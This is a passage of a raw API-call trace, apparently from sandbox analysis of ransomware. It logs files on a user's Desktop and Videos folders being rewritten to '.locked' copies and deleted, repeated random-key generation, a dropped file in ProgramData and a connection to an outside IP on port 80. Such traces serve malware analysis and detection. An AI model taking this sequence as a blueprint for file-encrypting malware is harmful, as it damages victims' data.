lpMode=0x125e5e88 | out: lpMode=0x125e5e88) returned 0 [0321.572] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0321.589] SetEvent (hEvent=0x220) returned 1 [0321.589] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0321.589] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0321.592] SetEvent (hEvent=0x220) returned 1 [0321.592] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0321.638] SetEvent (hEvent=0x12c) returned 1 [0321.638] WriteFile (in: hFile=0x1a4, lpBuffer=0x12348210*, nNumberOfBytesToWrite=0x2f, lpNumberOfBytesWritten=0x125dbe64, lpOverlapped=0x0 | out: lpBuffer=0x12348210*, lpNumberOfBytesWritten=0x125dbe64*=0x2f, lpOverlapped=0x0) returned 1 [0321.638] CloseHandle (hObject=0x1a4) returned 1 [0321.639] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Videos\\zPSZHcru.mp4" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\zpszhcru.mp4")) returned 1 [0321.654] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x3278fb30, ulCount=0x10, ulNumEntriesRemoved=0x3278fb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x3278fb30, ulNumEntriesRemoved=0x3278fb10) returned 0 [0321.654] SetEvent (hEvent=0x12c) returned 1 [0321.656] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0x1) returned 0x0 [0321.657] SetEvent (hEvent=0x12c) returned 1 [0321.657] SetEvent (hEvent=0x220) returned 1 [0321.657] SetEvent (hEvent=0x184) returned 1 [0321.657] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0321.658] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x3278fb34, ulCount=0x10, ulNumEntriesRemoved=0x3278fb14, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x3278fb34, ulNumEntriesRemoved=0x3278fb14) returned 0 [0321.658] SetEvent (hEvent=0x150) returned 1 [0321.658] SetEvent (hEvent=0x184) returned 1 [0321.680] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0x1) returned 0x102 [0321.682] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0321.682] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x3278fb30, ulCount=0x10, ulNumEntriesRemoved=0x3278fb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x3278fb30, ulNumEntriesRemoved=0x3278fb10) returned 0 [0321.682] SetEvent (hEvent=0x184) returned 1 [0321.684] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0x1) returned 0x0 [0321.685] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0x1) returned 0x0 [0321.685] SetEvent (hEvent=0x184) returned 1 [0321.685] SetEvent (hEvent=0x220) returned 1 [0321.685] SetEvent (hEvent=0x12c) returned 1 [0321.685] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0321.685] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x3278fb34, ulCount=0x10, ulNumEntriesRemoved=0x3278fb14, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x3278fb34, ulNumEntriesRemoved=0x3278fb14) returned 0 [0321.685] SetEvent (hEvent=0x12c) returned 1 [0321.686] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Videos\\zPSZHcru.mp4" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\zpszhcru.mp4"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0321.687] GetConsoleMode (in: hConsoleHandle=0x1a4, lpMode=0x125e7e88 | out: lpMode=0x125e7e88) returned 0 [0321.687] WriteFile (in: hFile=0x1a4, lpBuffer=0x12770000*, nNumberOfBytesToWrite=0xfa000, lpNumberOfBytesWritten=0x125e7e78, lpOverlapped=0x0 | out: lpBuffer=0x12770000*, lpNumberOfBytesWritten=0x125e7e78*=0xfa000, lpOverlapped=0x0) returned 1 [0321.706] CloseHandle (hObject=0x1a4) returned 1 [0321.706] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Videos\\zPSZHcru.mp4" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\zpszhcru.mp4")) returned 1 [0321.711] SetEvent (hEvent=0x220) returned 1 [0321.711] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x40, pbBuffer=0x12380040 | out: pbBuffer=0x12380040) returned 1 [0321.713] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x40, pbBuffer=0x12380040 | out: pbBuffer=0x12380040) returned 1 [0321.715] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x40, pbBuffer=0x12380040 | out: pbBuffer=0x12380040) returned 1 [0321.715] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x40, pbBuffer=0x12380040 | out: pbBuffer=0x12380040) returned 1 [0321.716] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x40, pbBuffer=0x12380040 | out: pbBuffer=0x12380040) returned 1 [0321.717] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x40, pbBuffer=0x12380040 | out: pbBuffer=0x12380040) returned 1 [0321.734] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x40, pbBuffer=0x123807c0 | out: pbBuffer=0x123807c0) returned 1 [0321.735] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x40, pbBuffer=0x123807c0 | out: pbBuffer=0x123807c0) returned 1 [0321.736] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x40, pbBuffer=0x123807c0 | out: pbBuffer=0x123807c0) returned 1 [0321.737] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x40, pbBuffer=0x123807c0 | out: pbBuffer=0x123807c0) returned 1 [0321.738] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x40, pbBuffer=0x123807c0 | out: pbBuffer=0x123807c0) returned 1 [0321.739] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x40, pbBuffer=0x123807c0 | out: pbBuffer=0x123807c0) returned 1 [0321.739] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x40, pbBuffer=0x123807c0 | out: pbBuffer=0x123807c0) returned 1 [0321.740] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x40, pbBuffer=0x123807c0 | out: pbBuffer=0x123807c0) returned 1 [0321.741] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x40, pbBuffer=0x123807c0 | out: pbBuffer=0x123807c0) returned 1 [0321.741] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x40, pbBuffer=0x123807c0 | out: pbBuffer=0x123807c0) returned 1 [0321.742] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x40, pbBuffer=0x123807c0 | out: pbBuffer=0x123807c0) returned 1 [0321.743] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x40, pbBuffer=0x123807c0 | out: pbBuffer=0x123807c0) returned 1 [0321.744] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x40, pbBuffer=0x123807c0 | out: pbBuffer=0x123807c0) returned 1 [0321.744] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x40, pbBuffer=0x123807c0 | out: pbBuffer=0x123807c0) returned 1 [0321.745] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x40, pbBuffer=0x123807c0 | out: pbBuffer=0x123807c0) returned 1 [0321.746] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x40, pbBuffer=0x123807c0 | out: pbBuffer=0x123807c0) returned 1 [0321.746] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x40, pbBuffer=0x123807c0 | out: pbBuffer=0x123807c0) returned 1 [0321.747] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x40, pbBuffer=0x123807c0 | out: pbBuffer=0x123807c0) returned 1 [0321.748] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x40, pbBuffer=0x123807c0 | out: pbBuffer=0x123807c0) returned 1 [0321.749] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x40, pbBuffer=0x123807c0 | out: pbBuffer=0x123807c0) returned 1 [0321.750] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x40, pbBuffer=0x123807c0 | out: pbBuffer=0x123807c0) returned 1 [0321.751] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x40, pbBuffer=0x123807c0 | out: pbBuffer=0x123807c0) returned 1 [0321.752] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x40, pbBuffer=0x123807c0 | out: pbBuffer=0x123807c0) returned 1 [0321.752] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x40, pbBuffer=0x123807c0 | out: pbBuffer=0x123807c0) returned 1 [0321.753] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x40, pbBuffer=0x123807c0 | out: pbBuffer=0x123807c0) returned 1 [0321.754] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x40, pbBuffer=0x123807c0 | out: pbBuffer=0x123807c0) returned 1 [0321.755] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x40, pbBuffer=0x123807c0 | out: pbBuffer=0x123807c0) returned 1 [0321.755] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x40, pbBuffer=0x123807c0 | out: pbBuffer=0x123807c0) returned 1 [0321.756] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x40, pbBuffer=0x123807c0 | out: pbBuffer=0x123807c0) returned 1 [0321.757] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x40, pbBuffer=0x123807c0 | out: pbBuffer=0x123807c0) returned 1 [0321.757] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x40, pbBuffer=0x123807c0 | out: pbBuffer=0x123807c0) returned 1 [0321.758] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x40, pbBuffer=0x123807c0 | out: pbBuffer=0x123807c0) returned 1 [0321.759] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x40, pbBuffer=0x123807c0 | out: pbBuffer=0x123807c0) returned 1 [0321.760] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x40, pbBuffer=0x123807c0 | out: pbBuffer=0x123807c0) returned 1 [0321.760] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x40, pbBuffer=0x123807c0 | out: pbBuffer=0x123807c0) returned 1 [0321.761] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x40, pbBuffer=0x123807c0 | out: pbBuffer=0x123807c0) returned 1 [0321.762] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x40, pbBuffer=0x123807c0 | out: pbBuffer=0x123807c0) returned 1 [0321.762] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x40, pbBuffer=0x123807c0 | out: pbBuffer=0x123807c0) returned 1 [0321.763] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x40, pbBuffer=0x123807c0 | out: pbBuffer=0x123807c0) returned 1 [0321.764] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x40, pbBuffer=0x123807c0 | out: pbBuffer=0x123807c0) returned 1 [0321.764] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x40, pbBuffer=0x123807c0 | out: pbBuffer=0x123807c0) returned 1 [0321.765] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x40, pbBuffer=0x123807c0 | out: pbBuffer=0x123807c0) returned 1 [0321.766] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x40, pbBuffer=0x123807c0 | out: pbBuffer=0x123807c0) returned 1 [0321.766] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x40, pbBuffer=0x123807c0 | out: pbBuffer=0x123807c0) returned 1 [0321.767] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x40, pbBuffer=0x123807c0 | out: pbBuffer=0x123807c0) returned 1 [0321.768] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x40, pbBuffer=0x123807c0 | out: pbBuffer=0x123807c0) returned 1 [0321.769] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x40, pbBuffer=0x123807c0 | out: pbBuffer=0x123807c0) returned 1 [0321.770] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x40, pbBuffer=0x123807c0 | out: pbBuffer=0x123807c0) returned 1 [0321.770] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x40, pbBuffer=0x123807c0 | out: pbBuffer=0x123807c0) returned 1 [0321.771] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x40, pbBuffer=0x123807c0 | out: pbBuffer=0x123807c0) returned 1 [0321.772] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x40, pbBuffer=0x123807c0 | out: pbBuffer=0x123807c0) returned 1 [0321.772] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x40, pbBuffer=0x123807c0 | out: pbBuffer=0x123807c0) returned 1 [0321.800] CreateFileW (lpFileName="C:\\ProgramData\\keEeR.txt" (normalized: "c:\\programdata\\keeer.txt"), dwDesiredAccess=0x80000004, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0321.801] GetConsoleMode (in: hConsoleHandle=0x1a4, lpMode=0x125e7e44 | out: lpMode=0x125e7e44) returned 0 [0321.801] WriteFile (in: hFile=0x1a4, lpBuffer=0x124a8020*, nNumberOfBytesToWrite=0xf, lpNumberOfBytesWritten=0x125e7e14, lpOverlapped=0x0 | out: lpBuffer=0x124a8020*, lpNumberOfBytesWritten=0x125e7e14*=0xf, lpOverlapped=0x0) returned 1 [0321.801] CloseHandle (hObject=0x1a4) returned 1 [0321.802] WSASocketW (af=2, type=1, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x81) returned 0x1f4 [0321.804] setsockopt (s=0x1f4, level=65535, optname=32, optval="\x01", optlen=4) returned -1 [0321.805] CreateIoCompletionPort (FileHandle=0x1f4, ExistingCompletionPort=0x174, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x174 [0321.805] SetFileCompletionNotificationModes (FileHandle=0x1f4, Flags=0x3) returned 1 [0321.805] bind (s=0x1f4, addr=0x1263f028*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0321.806] SetEvent (hEvent=0x220) returned 1 [0321.806] ConnectEx (in: s=0x1f4, name=0x1263f008*(sa_family=2, sin_port=0x50, sin_addr="193.56.28.159"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x0, lpOverlapped=0x12678088 | out: lpdwBytesSent=0x0) returned 0 [0321.807] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) Thread: id = 427 os_tid = 0xf14 Thread: id = 434 os_tid = 0x1064 [0256.817] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0xfffffffe, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x331eff58, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x331eff58*=0x178) returned 1 [0256.817] SetEvent (hEvent=0x14c) returned 1 [0256.817] SetEvent (hEvent=0x104) returned 1 [0256.817] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x134 [0256.817] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0256.818] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0256.819] SetEvent (hEvent=0x14c) returned 1 [0256.819] SetEvent (hEvent=0x104) returned 1 [0256.819] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0256.822] SetEvent (hEvent=0x104) returned 1 [0256.822] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0256.849] SetEvent (hEvent=0x12c) returned 1 [0256.850] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0257.859] SetEvent (hEvent=0x12c) returned 1 [0257.859] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x12390000*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x12635a24, lpReserved=0x0 | out: lpBuffer=0x12390000*, lpNumberOfCharsWritten=0x12635a24*=0xa) returned 1 [0257.989] SetEvent (hEvent=0x12c) returned 1 [0257.989] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x1) returned 0x102 [0258.214] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0258.214] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x331efb30, ulCount=0x10, ulNumEntriesRemoved=0x331efb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x331efb30, ulNumEntriesRemoved=0x331efb10) returned 0 [0258.214] SetEvent (hEvent=0x150) returned 1 [0258.214] SetEvent (hEvent=0x12c) returned 1 [0258.215] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x1) returned 0x102 [0258.274] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0258.274] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x1) returned 0x102 [0258.326] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0258.326] SetEvent (hEvent=0x12c) returned 1 [0258.326] SetEvent (hEvent=0x104) returned 1 [0258.326] SetEvent (hEvent=0x14c) returned 1 [0258.326] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0258.431] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x331efb34, ulCount=0x10, ulNumEntriesRemoved=0x331efb14, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x331efb34, ulNumEntriesRemoved=0x331efb14) returned 0 [0258.431] SetEvent (hEvent=0x150) returned 1 [0258.431] SetEvent (hEvent=0x14c) returned 1 [0258.431] VirtualAlloc (lpAddress=0x0, dwSize=0x10000, flAllocationType=0x3000, flProtect=0x4) returned 0x790000 [0258.432] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\EMZ6NoSJq0-2xx6IW.wav" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\emz6nosjq0-2xx6iw.wav"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x184 [0258.432] GetConsoleMode (in: hConsoleHandle=0x184, lpMode=0x12639d9c | out: lpMode=0x12639d9c) returned 0 [0258.432] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\EMZ6NoSJq0-2xx6IW.wav.locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\emz6nosjq0-2xx6iw.wav.locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0258.432] GetConsoleMode (in: hConsoleHandle=0x188, lpMode=0x12639d9c | out: lpMode=0x12639d9c) returned 0 [0258.432] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x12390000 | out: pbBuffer=0x12390000) returned 1 [0258.432] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x10, pbBuffer=0x1234e030 | out: pbBuffer=0x1234e030) returned 1 [0258.432] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x12340281 | out: pbBuffer=0x12340281) returned 1 [0258.433] WriteFile (in: hFile=0x188, lpBuffer=0x12649000*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12639d78, lpOverlapped=0x0 | out: lpBuffer=0x12649000*, lpNumberOfBytesWritten=0x12639d78*=0x80, lpOverlapped=0x0) returned 1 [0258.434] VirtualAlloc (lpAddress=0x13210000, dwSize=0x9d0000, flAllocationType=0x1000, flProtect=0x4) returned 0x13210000 [0258.509] VirtualAlloc (lpAddress=0x10f82000, dwSize=0x9c000, flAllocationType=0x1000, flProtect=0x4) returned 0x10f82000 [0258.510] VirtualAlloc (lpAddress=0x2167000, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x4) returned 0x2167000 [0258.838] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0258.873] SetEvent (hEvent=0x14c) returned 1 [0258.873] SetEvent (hEvent=0x12c) returned 1 [0258.873] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0258.942] SetEvent (hEvent=0x14c) returned 1 [0258.942] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0259.021] SetEvent (hEvent=0x12c) returned 1 [0259.021] SetEvent (hEvent=0x104) returned 1 [0259.021] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0259.088] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x12390000*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x12639a24, lpReserved=0x0 | out: lpBuffer=0x12390000*, lpNumberOfCharsWritten=0x12639a24*=0xa) returned 1 [0259.262] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0259.429] SetEvent (hEvent=0x14c) returned 1 [0259.429] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0259.498] SetEvent (hEvent=0x14c) returned 1 [0259.498] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0259.531] SetEvent (hEvent=0x14c) returned 1 [0259.531] SetEvent (hEvent=0x104) returned 1 [0259.531] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x12390020*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x124b9a24, lpReserved=0x0 | out: lpBuffer=0x12390020*, lpNumberOfCharsWritten=0x124b9a24*=0xa) returned 1 [0259.536] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0259.747] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0259.831] SetEvent (hEvent=0x14c) returned 1 [0259.831] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0260.065] SetEvent (hEvent=0x190) returned 1 [0260.065] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0260.141] SetEvent (hEvent=0x190) returned 1 [0260.141] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0260.152] SetEvent (hEvent=0x190) returned 1 [0260.152] SetEvent (hEvent=0x104) returned 1 [0260.152] SetEvent (hEvent=0x14c) returned 1 [0260.152] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0260.199] SetEvent (hEvent=0x190) returned 1 [0260.199] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0260.330] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1234c220*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x12637a24, lpReserved=0x0 | out: lpBuffer=0x1234c220*, lpNumberOfCharsWritten=0x12637a24*=0xa) returned 1 [0260.375] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\9fTBKDfklFX1UCW.avi" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\9ftbkdfklfx1ucw.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0260.376] GetConsoleMode (in: hConsoleHandle=0x188, lpMode=0x12637d9c | out: lpMode=0x12637d9c) returned 0 [0260.376] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\9fTBKDfklFX1UCW.avi.locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\9ftbkdfklfx1ucw.avi.locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0260.707] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0260.714] SetEvent (hEvent=0x1d0) returned 1 [0260.714] GetConsoleMode (in: hConsoleHandle=0x1d4, lpMode=0x12637d9c | out: lpMode=0x12637d9c) returned 0 [0260.714] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0260.832] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0260.851] SetEvent (hEvent=0x1e8) returned 1 [0260.851] SetEvent (hEvent=0x104) returned 1 [0260.851] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0260.857] SetEvent (hEvent=0x1f0) returned 1 [0260.857] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0260.859] SetEvent (hEvent=0x1dc) returned 1 [0260.859] SetEvent (hEvent=0x12c) returned 1 [0260.859] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0260.972] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0261.041] SetEvent (hEvent=0x12c) returned 1 [0261.041] SetEvent (hEvent=0x1dc) returned 1 [0261.041] ReadFile (in: hFile=0x188, lpBuffer=0x13fa2000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x1276bd68, lpOverlapped=0x0 | out: lpBuffer=0x13fa2000*, lpNumberOfBytesRead=0x1276bd68*=0x28d4, lpOverlapped=0x0) returned 1 [0261.043] WriteFile (in: hFile=0x1d4, lpBuffer=0x13fa2000*, nNumberOfBytesToWrite=0x28d4, lpNumberOfBytesWritten=0x1276bd74, lpOverlapped=0x0 | out: lpBuffer=0x13fa2000*, lpNumberOfBytesWritten=0x1276bd74*=0x28d4, lpOverlapped=0x0) returned 1 [0261.046] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0261.564] ReadFile (in: hFile=0x188, lpBuffer=0x13fa2000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x1276bd68, lpOverlapped=0x0 | out: lpBuffer=0x13fa2000*, lpNumberOfBytesRead=0x1276bd68*=0x0, lpOverlapped=0x0) returned 1 [0261.565] CloseHandle (hObject=0x1d4) returned 1 [0261.816] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0262.131] SetEvent (hEvent=0x150) returned 1 [0262.131] SetEvent (hEvent=0x214) returned 1 [0262.131] CloseHandle (hObject=0x188) returned 1 [0262.131] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0262.784] SetEvent (hEvent=0x1f0) returned 1 [0262.785] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0262.878] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0262.932] SetEvent (hEvent=0x220) returned 1 [0262.932] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0262.998] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x1) returned 0x102 [0263.004] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0263.004] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x331efb30, ulCount=0x10, ulNumEntriesRemoved=0x331efb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x331efb30, ulNumEntriesRemoved=0x331efb10) returned 0 [0263.004] SetEvent (hEvent=0x150) returned 1 [0263.004] SetEvent (hEvent=0x12c) returned 1 [0263.004] SetEvent (hEvent=0x104) returned 1 [0263.004] ReadFile (in: hFile=0x1f8, lpBuffer=0x13af8000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x1276ad68, lpOverlapped=0x0 | out: lpBuffer=0x13af8000*, lpNumberOfBytesRead=0x1276ad68*=0xdd73, lpOverlapped=0x0) returned 1 [0263.006] WriteFile (in: hFile=0x1d4, lpBuffer=0x13af8000*, nNumberOfBytesToWrite=0xdd73, lpNumberOfBytesWritten=0x1276ad74, lpOverlapped=0x0 | out: lpBuffer=0x13af8000*, lpNumberOfBytesWritten=0x1276ad74*=0xdd73, lpOverlapped=0x0) returned 1 [0263.025] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0265.591] ReadFile (in: hFile=0x1f8, lpBuffer=0x13af8000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x1276ad68, lpOverlapped=0x0 | out: lpBuffer=0x13af8000*, lpNumberOfBytesRead=0x1276ad68*=0x0, lpOverlapped=0x0) returned 1 [0265.592] CloseHandle (hObject=0x1d4) returned 1 [0265.596] CloseHandle (hObject=0x1f8) returned 1 [0265.596] CreateFileW (lpFileName="C:\\ProgramData\\keEeR.txt" (normalized: "c:\\programdata\\keeer.txt"), dwDesiredAccess=0x80000004, 